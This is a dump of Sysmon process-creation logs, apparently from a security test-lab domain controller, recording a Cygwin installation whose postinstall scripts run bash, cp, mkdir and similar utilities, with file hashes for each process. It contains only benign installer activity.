14:56:00.346{A8622C2F-5400-6078-800B-00000000AE01}6552C:\cygwin64\bin\cp.exe-----"C:\cygwin64\bin\cp.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=D65A875D91ECD4B5C0AB5E9D756E7627,SHA256=0572CDC8657D5F58423216D9E8EFA613EE22633571B6CEC7689888AE1A1D194F,IMPHASH=B3F0A23F2646ADA5A25EDB28C3DCB675{A8622C2F-5400-6078-7F0B-00000000AE01}5344C:\cygwin64\bin\bash.exeC:\cygwin64\bin\bash.exe --norc --noprofile "/etc/postinstall/base-files-profile.sh" 154100x800000000000000055338Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:56:00.338{A8622C2F-5400-6078-7F0B-00000000AE01}5344C:\cygwin64\bin\bash.exe-----C:\cygwin64\bin\bash.exe --norc --noprofile 
"/etc/postinstall/base-files-profile.sh"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=3F97459F21CAC8040D83AE12C5C0E6C1,SHA256=78D1760E7EAD9D594CB0183E9632AF761DF9D4C46714BB92086D5DE99351050D,IMPHASH=E8D8802100FAA877AC12771D566353AC{A8622C2F-5400-6078-610B-00000000AE01}1156C:\cygwin64\bin\bash.exeC:\cygwin64\bin\bash.exe --norc --noprofile "/etc/postinstall/base-files-profile.sh" 154100x800000000000000055327Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:56:00.330{A8622C2F-5400-6078-7E0B-00000000AE01}4268C:\cygwin64\bin\mkdir.exe-----"C:\cygwin64\bin\mkdir.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=43A2242A9A00207A5151EFDFE7D5F1CC,SHA256=4D58077C681B1CBF1AC4DA590A8B62793DDE0985512D6388E6336E29787BDBDE,IMPHASH=0D7E7D292EB4263C4CC1C956F7B5986F{A8622C2F-5400-6078-7D0B-00000000AE01}6032C:\cygwin64\bin\bash.exeC:\cygwin64\bin\bash.exe --norc --noprofile "/etc/postinstall/base-files-profile.sh" 154100x800000000000000055317Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:56:00.322{A8622C2F-5400-6078-7D0B-00000000AE01}6032C:\cygwin64\bin\bash.exe-----C:\cygwin64\bin\bash.exe --norc --noprofile "/etc/postinstall/base-files-profile.sh"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=3F97459F21CAC8040D83AE12C5C0E6C1,SHA256=78D1760E7EAD9D594CB0183E9632AF761DF9D4C46714BB92086D5DE99351050D,IMPHASH=E8D8802100FAA877AC12771D566353AC{A8622C2F-5400-6078-610B-00000000AE01}1156C:\cygwin64\bin\bash.exeC:\cygwin64\bin\bash.exe --norc --noprofile "/etc/postinstall/base-files-profile.sh" 154100x800000000000000055306Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 
14:56:00.314{A8622C2F-5400-6078-7C0B-00000000AE01}5516C:\cygwin64\bin\dirname.exe-----"C:\cygwin64\bin\dirname.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=A84314B8BECFF78D8B5E0CA826F03EC6,SHA256=AAB8A23A51886A20562D5B3AAAC00783F10BDC1580AE06E9D05A1643A96E4F1C,IMPHASH=210178600FC4F306F06ABF8ABCF147D6{A8622C2F-5400-6078-7B0B-00000000AE01}6592C:\cygwin64\bin\bash.exeC:\cygwin64\bin\bash.exe --norc --noprofile "/etc/postinstall/base-files-profile.sh" 154100x800000000000000055296Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:56:00.306{A8622C2F-5400-6078-7B0B-00000000AE01}6592C:\cygwin64\bin\bash.exe-----C:\cygwin64\bin\bash.exe --norc --noprofile "/etc/postinstall/base-files-profile.sh"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=3F97459F21CAC8040D83AE12C5C0E6C1,SHA256=78D1760E7EAD9D594CB0183E9632AF761DF9D4C46714BB92086D5DE99351050D,IMPHASH=E8D8802100FAA877AC12771D566353AC{A8622C2F-5400-6078-610B-00000000AE01}1156C:\cygwin64\bin\bash.exeC:\cygwin64\bin\bash.exe --norc --noprofile "/etc/postinstall/base-files-profile.sh" 154100x800000000000000055283Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:56:00.297{A8622C2F-5400-6078-7A0B-00000000AE01}6440C:\cygwin64\bin\cp.exe-----"C:\cygwin64\bin\cp.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=D65A875D91ECD4B5C0AB5E9D756E7627,SHA256=0572CDC8657D5F58423216D9E8EFA613EE22633571B6CEC7689888AE1A1D194F,IMPHASH=B3F0A23F2646ADA5A25EDB28C3DCB675{A8622C2F-5400-6078-790B-00000000AE01}1844C:\cygwin64\bin\bash.exeC:\cygwin64\bin\bash.exe --norc --noprofile "/etc/postinstall/base-files-profile.sh" 154100x800000000000000055273Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:56:00.289{A8622C2F-5400-6078-790B-00000000AE01}1844C:\cygwin64\bin\bash.exe-----C:\cygwin64\bin\bash.exe --norc --noprofile 
"/etc/postinstall/base-files-profile.sh"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=3F97459F21CAC8040D83AE12C5C0E6C1,SHA256=78D1760E7EAD9D594CB0183E9632AF761DF9D4C46714BB92086D5DE99351050D,IMPHASH=E8D8802100FAA877AC12771D566353AC{A8622C2F-5400-6078-610B-00000000AE01}1156C:\cygwin64\bin\bash.exeC:\cygwin64\bin\bash.exe --norc --noprofile "/etc/postinstall/base-files-profile.sh" 154100x800000000000000055262Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:56:00.282{A8622C2F-5400-6078-780B-00000000AE01}7140C:\cygwin64\bin\mkdir.exe-----"C:\cygwin64\bin\mkdir.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=43A2242A9A00207A5151EFDFE7D5F1CC,SHA256=4D58077C681B1CBF1AC4DA590A8B62793DDE0985512D6388E6336E29787BDBDE,IMPHASH=0D7E7D292EB4263C4CC1C956F7B5986F{A8622C2F-5400-6078-770B-00000000AE01}5964C:\cygwin64\bin\bash.exeC:\cygwin64\bin\bash.exe --norc --noprofile "/etc/postinstall/base-files-profile.sh" 154100x800000000000000055252Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:56:00.274{A8622C2F-5400-6078-770B-00000000AE01}5964C:\cygwin64\bin\bash.exe-----C:\cygwin64\bin\bash.exe --norc --noprofile "/etc/postinstall/base-files-profile.sh"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=3F97459F21CAC8040D83AE12C5C0E6C1,SHA256=78D1760E7EAD9D594CB0183E9632AF761DF9D4C46714BB92086D5DE99351050D,IMPHASH=E8D8802100FAA877AC12771D566353AC{A8622C2F-5400-6078-610B-00000000AE01}1156C:\cygwin64\bin\bash.exeC:\cygwin64\bin\bash.exe --norc --noprofile "/etc/postinstall/base-files-profile.sh" 154100x800000000000000055241Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 
14:56:00.266{A8622C2F-5400-6078-760B-00000000AE01}5828C:\cygwin64\bin\dirname.exe-----"C:\cygwin64\bin\dirname.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=A84314B8BECFF78D8B5E0CA826F03EC6,SHA256=AAB8A23A51886A20562D5B3AAAC00783F10BDC1580AE06E9D05A1643A96E4F1C,IMPHASH=210178600FC4F306F06ABF8ABCF147D6{A8622C2F-5400-6078-750B-00000000AE01}6672C:\cygwin64\bin\bash.exeC:\cygwin64\bin\bash.exe --norc --noprofile "/etc/postinstall/base-files-profile.sh" 154100x800000000000000055231Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:56:00.258{A8622C2F-5400-6078-750B-00000000AE01}6672C:\cygwin64\bin\bash.exe-----C:\cygwin64\bin\bash.exe --norc --noprofile "/etc/postinstall/base-files-profile.sh"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=3F97459F21CAC8040D83AE12C5C0E6C1,SHA256=78D1760E7EAD9D594CB0183E9632AF761DF9D4C46714BB92086D5DE99351050D,IMPHASH=E8D8802100FAA877AC12771D566353AC{A8622C2F-5400-6078-610B-00000000AE01}1156C:\cygwin64\bin\bash.exeC:\cygwin64\bin\bash.exe --norc --noprofile "/etc/postinstall/base-files-profile.sh" 154100x800000000000000055218Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:56:00.249{A8622C2F-5400-6078-740B-00000000AE01}5744C:\cygwin64\bin\cp.exe-----"C:\cygwin64\bin\cp.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=D65A875D91ECD4B5C0AB5E9D756E7627,SHA256=0572CDC8657D5F58423216D9E8EFA613EE22633571B6CEC7689888AE1A1D194F,IMPHASH=B3F0A23F2646ADA5A25EDB28C3DCB675{A8622C2F-5400-6078-730B-00000000AE01}1028C:\cygwin64\bin\bash.exeC:\cygwin64\bin\bash.exe --norc --noprofile "/etc/postinstall/base-files-profile.sh" 154100x800000000000000055208Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:56:00.241{A8622C2F-5400-6078-730B-00000000AE01}1028C:\cygwin64\bin\bash.exe-----C:\cygwin64\bin\bash.exe --norc --noprofile 
"/etc/postinstall/base-files-profile.sh"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=3F97459F21CAC8040D83AE12C5C0E6C1,SHA256=78D1760E7EAD9D594CB0183E9632AF761DF9D4C46714BB92086D5DE99351050D,IMPHASH=E8D8802100FAA877AC12771D566353AC{A8622C2F-5400-6078-610B-00000000AE01}1156C:\cygwin64\bin\bash.exeC:\cygwin64\bin\bash.exe --norc --noprofile "/etc/postinstall/base-files-profile.sh" 154100x800000000000000055197Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:56:00.234{A8622C2F-5400-6078-720B-00000000AE01}4476C:\cygwin64\bin\mkdir.exe-----"C:\cygwin64\bin\mkdir.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=43A2242A9A00207A5151EFDFE7D5F1CC,SHA256=4D58077C681B1CBF1AC4DA590A8B62793DDE0985512D6388E6336E29787BDBDE,IMPHASH=0D7E7D292EB4263C4CC1C956F7B5986F{A8622C2F-5400-6078-710B-00000000AE01}1348C:\cygwin64\bin\bash.exeC:\cygwin64\bin\bash.exe --norc --noprofile "/etc/postinstall/base-files-profile.sh" 154100x800000000000000055187Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:56:00.226{A8622C2F-5400-6078-710B-00000000AE01}1348C:\cygwin64\bin\bash.exe-----C:\cygwin64\bin\bash.exe --norc --noprofile "/etc/postinstall/base-files-profile.sh"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=3F97459F21CAC8040D83AE12C5C0E6C1,SHA256=78D1760E7EAD9D594CB0183E9632AF761DF9D4C46714BB92086D5DE99351050D,IMPHASH=E8D8802100FAA877AC12771D566353AC{A8622C2F-5400-6078-610B-00000000AE01}1156C:\cygwin64\bin\bash.exeC:\cygwin64\bin\bash.exe --norc --noprofile "/etc/postinstall/base-files-profile.sh" 154100x800000000000000055176Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 
14:56:00.218{A8622C2F-5400-6078-700B-00000000AE01}6580C:\cygwin64\bin\dirname.exe-----"C:\cygwin64\bin\dirname.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=A84314B8BECFF78D8B5E0CA826F03EC6,SHA256=AAB8A23A51886A20562D5B3AAAC00783F10BDC1580AE06E9D05A1643A96E4F1C,IMPHASH=210178600FC4F306F06ABF8ABCF147D6{A8622C2F-5400-6078-6F0B-00000000AE01}6700C:\cygwin64\bin\bash.exeC:\cygwin64\bin\bash.exe --norc --noprofile "/etc/postinstall/base-files-profile.sh" 154100x800000000000000055166Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:56:00.210{A8622C2F-5400-6078-6F0B-00000000AE01}6700C:\cygwin64\bin\bash.exe-----C:\cygwin64\bin\bash.exe --norc --noprofile "/etc/postinstall/base-files-profile.sh"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=3F97459F21CAC8040D83AE12C5C0E6C1,SHA256=78D1760E7EAD9D594CB0183E9632AF761DF9D4C46714BB92086D5DE99351050D,IMPHASH=E8D8802100FAA877AC12771D566353AC{A8622C2F-5400-6078-610B-00000000AE01}1156C:\cygwin64\bin\bash.exeC:\cygwin64\bin\bash.exe --norc --noprofile "/etc/postinstall/base-files-profile.sh" 154100x800000000000000055153Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:56:00.201{A8622C2F-5400-6078-6E0B-00000000AE01}2408C:\cygwin64\bin\cp.exe-----"C:\cygwin64\bin\cp.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=D65A875D91ECD4B5C0AB5E9D756E7627,SHA256=0572CDC8657D5F58423216D9E8EFA613EE22633571B6CEC7689888AE1A1D194F,IMPHASH=B3F0A23F2646ADA5A25EDB28C3DCB675{A8622C2F-5400-6078-6D0B-00000000AE01}3008C:\cygwin64\bin\bash.exeC:\cygwin64\bin\bash.exe --norc --noprofile "/etc/postinstall/base-files-profile.sh" 154100x800000000000000055143Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:56:00.194{A8622C2F-5400-6078-6D0B-00000000AE01}3008C:\cygwin64\bin\bash.exe-----C:\cygwin64\bin\bash.exe --norc --noprofile 
"/etc/postinstall/base-files-profile.sh"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=3F97459F21CAC8040D83AE12C5C0E6C1,SHA256=78D1760E7EAD9D594CB0183E9632AF761DF9D4C46714BB92086D5DE99351050D,IMPHASH=E8D8802100FAA877AC12771D566353AC{A8622C2F-5400-6078-610B-00000000AE01}1156C:\cygwin64\bin\bash.exeC:\cygwin64\bin\bash.exe --norc --noprofile "/etc/postinstall/base-files-profile.sh" 154100x800000000000000055132Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:56:00.186{A8622C2F-5400-6078-6C0B-00000000AE01}4860C:\cygwin64\bin\mkdir.exe-----"C:\cygwin64\bin\mkdir.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=43A2242A9A00207A5151EFDFE7D5F1CC,SHA256=4D58077C681B1CBF1AC4DA590A8B62793DDE0985512D6388E6336E29787BDBDE,IMPHASH=0D7E7D292EB4263C4CC1C956F7B5986F{A8622C2F-5400-6078-6B0B-00000000AE01}1496C:\cygwin64\bin\bash.exeC:\cygwin64\bin\bash.exe --norc --noprofile "/etc/postinstall/base-files-profile.sh" 154100x800000000000000055122Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:56:00.178{A8622C2F-5400-6078-6B0B-00000000AE01}1496C:\cygwin64\bin\bash.exe-----C:\cygwin64\bin\bash.exe --norc --noprofile "/etc/postinstall/base-files-profile.sh"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=3F97459F21CAC8040D83AE12C5C0E6C1,SHA256=78D1760E7EAD9D594CB0183E9632AF761DF9D4C46714BB92086D5DE99351050D,IMPHASH=E8D8802100FAA877AC12771D566353AC{A8622C2F-5400-6078-610B-00000000AE01}1156C:\cygwin64\bin\bash.exeC:\cygwin64\bin\bash.exe --norc --noprofile "/etc/postinstall/base-files-profile.sh" 154100x800000000000000055111Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 
14:56:00.170{A8622C2F-5400-6078-6A0B-00000000AE01}4832C:\cygwin64\bin\dirname.exe-----"C:\cygwin64\bin\dirname.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=A84314B8BECFF78D8B5E0CA826F03EC6,SHA256=AAB8A23A51886A20562D5B3AAAC00783F10BDC1580AE06E9D05A1643A96E4F1C,IMPHASH=210178600FC4F306F06ABF8ABCF147D6{A8622C2F-5400-6078-690B-00000000AE01}5220C:\cygwin64\bin\bash.exeC:\cygwin64\bin\bash.exe --norc --noprofile "/etc/postinstall/base-files-profile.sh" 154100x800000000000000055101Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:56:00.162{A8622C2F-5400-6078-690B-00000000AE01}5220C:\cygwin64\bin\bash.exe-----C:\cygwin64\bin\bash.exe --norc --noprofile "/etc/postinstall/base-files-profile.sh"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=3F97459F21CAC8040D83AE12C5C0E6C1,SHA256=78D1760E7EAD9D594CB0183E9632AF761DF9D4C46714BB92086D5DE99351050D,IMPHASH=E8D8802100FAA877AC12771D566353AC{A8622C2F-5400-6078-610B-00000000AE01}1156C:\cygwin64\bin\bash.exeC:\cygwin64\bin\bash.exe --norc --noprofile "/etc/postinstall/base-files-profile.sh" 154100x800000000000000055087Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:56:00.153{A8622C2F-5400-6078-680B-00000000AE01}6268C:\cygwin64\bin\cp.exe-----"C:\cygwin64\bin\cp.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=D65A875D91ECD4B5C0AB5E9D756E7627,SHA256=0572CDC8657D5F58423216D9E8EFA613EE22633571B6CEC7689888AE1A1D194F,IMPHASH=B3F0A23F2646ADA5A25EDB28C3DCB675{A8622C2F-5400-6078-670B-00000000AE01}6240C:\cygwin64\bin\bash.exeC:\cygwin64\bin\bash.exe --norc --noprofile "/etc/postinstall/base-files-profile.sh" 154100x800000000000000055077Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:56:00.145{A8622C2F-5400-6078-670B-00000000AE01}6240C:\cygwin64\bin\bash.exe-----C:\cygwin64\bin\bash.exe --norc --noprofile 
"/etc/postinstall/base-files-profile.sh"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=3F97459F21CAC8040D83AE12C5C0E6C1,SHA256=78D1760E7EAD9D594CB0183E9632AF761DF9D4C46714BB92086D5DE99351050D,IMPHASH=E8D8802100FAA877AC12771D566353AC{A8622C2F-5400-6078-610B-00000000AE01}1156C:\cygwin64\bin\bash.exeC:\cygwin64\bin\bash.exe --norc --noprofile "/etc/postinstall/base-files-profile.sh" 154100x800000000000000055066Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:56:00.138{A8622C2F-5400-6078-660B-00000000AE01}2508C:\cygwin64\bin\mkdir.exe-----"C:\cygwin64\bin\mkdir.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=43A2242A9A00207A5151EFDFE7D5F1CC,SHA256=4D58077C681B1CBF1AC4DA590A8B62793DDE0985512D6388E6336E29787BDBDE,IMPHASH=0D7E7D292EB4263C4CC1C956F7B5986F{A8622C2F-5400-6078-650B-00000000AE01}5084C:\cygwin64\bin\bash.exeC:\cygwin64\bin\bash.exe --norc --noprofile "/etc/postinstall/base-files-profile.sh" 154100x800000000000000055056Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:56:00.130{A8622C2F-5400-6078-650B-00000000AE01}5084C:\cygwin64\bin\bash.exe-----C:\cygwin64\bin\bash.exe --norc --noprofile "/etc/postinstall/base-files-profile.sh"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=3F97459F21CAC8040D83AE12C5C0E6C1,SHA256=78D1760E7EAD9D594CB0183E9632AF761DF9D4C46714BB92086D5DE99351050D,IMPHASH=E8D8802100FAA877AC12771D566353AC{A8622C2F-5400-6078-610B-00000000AE01}1156C:\cygwin64\bin\bash.exeC:\cygwin64\bin\bash.exe --norc --noprofile "/etc/postinstall/base-files-profile.sh" 154100x800000000000000055045Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 
14:56:00.120{A8622C2F-5400-6078-640B-00000000AE01}4412C:\cygwin64\bin\dirname.exe-----"C:\cygwin64\bin\dirname.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=A84314B8BECFF78D8B5E0CA826F03EC6,SHA256=AAB8A23A51886A20562D5B3AAAC00783F10BDC1580AE06E9D05A1643A96E4F1C,IMPHASH=210178600FC4F306F06ABF8ABCF147D6{A8622C2F-5400-6078-630B-00000000AE01}5964C:\cygwin64\bin\bash.exeC:\cygwin64\bin\bash.exe --norc --noprofile "/etc/postinstall/base-files-profile.sh" 154100x800000000000000055035Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:56:00.111{A8622C2F-5400-6078-630B-00000000AE01}5964C:\cygwin64\bin\bash.exe-----C:\cygwin64\bin\bash.exe --norc --noprofile "/etc/postinstall/base-files-profile.sh"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=3F97459F21CAC8040D83AE12C5C0E6C1,SHA256=78D1760E7EAD9D594CB0183E9632AF761DF9D4C46714BB92086D5DE99351050D,IMPHASH=E8D8802100FAA877AC12771D566353AC{A8622C2F-5400-6078-610B-00000000AE01}1156C:\cygwin64\bin\bash.exeC:\cygwin64\bin\bash.exe --norc --noprofile "/etc/postinstall/base-files-profile.sh" 154100x800000000000000055017Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:56:00.072{A8622C2F-5400-6078-610B-00000000AE01}1156C:\cygwin64\bin\bash.exe-----C:\cygwin64\bin\bash.exe --norc --noprofile "/etc/postinstall/base-files-profile.sh"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=3F97459F21CAC8040D83AE12C5C0E6C1,SHA256=78D1760E7EAD9D594CB0183E9632AF761DF9D4C46714BB92086D5DE99351050D,IMPHASH=E8D8802100FAA877AC12771D566353AC{A8622C2F-53AA-6078-B907-00000000AE01}4420C:\Users\Administrator\Downloads\setup-x86_64.exe"C:\Users\Administrator\Downloads\setup-x86_64.exe" 154100x800000000000000055005Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 
14:56:00.057{A8622C2F-5400-6078-600B-00000000AE01}5804C:\cygwin64\bin\ln.exe-----"C:\cygwin64\bin\ln.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=3F7AD4972A563C9EF6C4900170F88D83,SHA256=A7D96AB536D123A651C9C3F729980E2967845021EE12AF2B9397654C1B6D9828,IMPHASH=780EE5A60A6D012573A93F16400D609B{A8622C2F-5400-6078-5F0B-00000000AE01}5852C:\cygwin64\bin\bash.exeC:\cygwin64\bin\bash.exe --norc --noprofile "/etc/postinstall/base-files-mketc.sh" 154100x800000000000000054995Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:56:00.049{A8622C2F-5400-6078-5F0B-00000000AE01}5852C:\cygwin64\bin\bash.exe-----C:\cygwin64\bin\bash.exe --norc --noprofile "/etc/postinstall/base-files-mketc.sh"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=3F97459F21CAC8040D83AE12C5C0E6C1,SHA256=78D1760E7EAD9D594CB0183E9632AF761DF9D4C46714BB92086D5DE99351050D,IMPHASH=E8D8802100FAA877AC12771D566353AC{A8622C2F-53FF-6078-4B0B-00000000AE01}4300C:\cygwin64\bin\bash.exeC:\cygwin64\bin\bash.exe --norc --noprofile "/etc/postinstall/base-files-mketc.sh" 154100x800000000000000054984Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:56:00.042{A8622C2F-5400-6078-5E0B-00000000AE01}928C:\cygwin64\bin\expr.exe-----"C:\cygwin64\bin\expr.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=AE850C7C3F5692C2D09DFC2B02C798B2,SHA256=E96561ECDFA070DC3C492186D1E51A0C2A4D94B1C4F4FA8715B7187F45BC9D7F,IMPHASH=BF34EBF5A6CAAB74C528530D342DA323{A8622C2F-5400-6078-5D0B-00000000AE01}5116C:\cygwin64\bin\bash.exeC:\cygwin64\bin\bash.exe --norc --noprofile "/etc/postinstall/base-files-mketc.sh" 154100x800000000000000054974Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:56:00.033{A8622C2F-5400-6078-5D0B-00000000AE01}5116C:\cygwin64\bin\bash.exe-----C:\cygwin64\bin\bash.exe --norc --noprofile 
"/etc/postinstall/base-files-mketc.sh"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=3F97459F21CAC8040D83AE12C5C0E6C1,SHA256=78D1760E7EAD9D594CB0183E9632AF761DF9D4C46714BB92086D5DE99351050D,IMPHASH=E8D8802100FAA877AC12771D566353AC{A8622C2F-53FF-6078-4B0B-00000000AE01}4300C:\cygwin64\bin\bash.exeC:\cygwin64\bin\bash.exe --norc --noprofile "/etc/postinstall/base-files-mketc.sh" 154100x800000000000000054961Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:56:00.024{A8622C2F-5400-6078-5C0B-00000000AE01}5776C:\cygwin64\bin\ln.exe-----"C:\cygwin64\bin\ln.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=3F7AD4972A563C9EF6C4900170F88D83,SHA256=A7D96AB536D123A651C9C3F729980E2967845021EE12AF2B9397654C1B6D9828,IMPHASH=780EE5A60A6D012573A93F16400D609B{A8622C2F-5400-6078-5B0B-00000000AE01}4568C:\cygwin64\bin\bash.exeC:\cygwin64\bin\bash.exe --norc --noprofile "/etc/postinstall/base-files-mketc.sh" 154100x800000000000000054951Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:56:00.016{A8622C2F-5400-6078-5B0B-00000000AE01}4568C:\cygwin64\bin\bash.exe-----C:\cygwin64\bin\bash.exe --norc --noprofile "/etc/postinstall/base-files-mketc.sh"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=3F97459F21CAC8040D83AE12C5C0E6C1,SHA256=78D1760E7EAD9D594CB0183E9632AF761DF9D4C46714BB92086D5DE99351050D,IMPHASH=E8D8802100FAA877AC12771D566353AC{A8622C2F-53FF-6078-4B0B-00000000AE01}4300C:\cygwin64\bin\bash.exeC:\cygwin64\bin\bash.exe --norc --noprofile "/etc/postinstall/base-files-mketc.sh" 154100x800000000000000054940Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 
14:56:00.009{A8622C2F-5400-6078-5A0B-00000000AE01}4056C:\cygwin64\bin\expr.exe-----"C:\cygwin64\bin\expr.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=AE850C7C3F5692C2D09DFC2B02C798B2,SHA256=E96561ECDFA070DC3C492186D1E51A0C2A4D94B1C4F4FA8715B7187F45BC9D7F,IMPHASH=BF34EBF5A6CAAB74C528530D342DA323{A8622C2F-5400-6078-590B-00000000AE01}5832C:\cygwin64\bin\bash.exeC:\cygwin64\bin\bash.exe --norc --noprofile "/etc/postinstall/base-files-mketc.sh" 154100x800000000000000054930Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:56:00.000{A8622C2F-5400-6078-590B-00000000AE01}5832C:\cygwin64\bin\bash.exe-----C:\cygwin64\bin\bash.exe --norc --noprofile 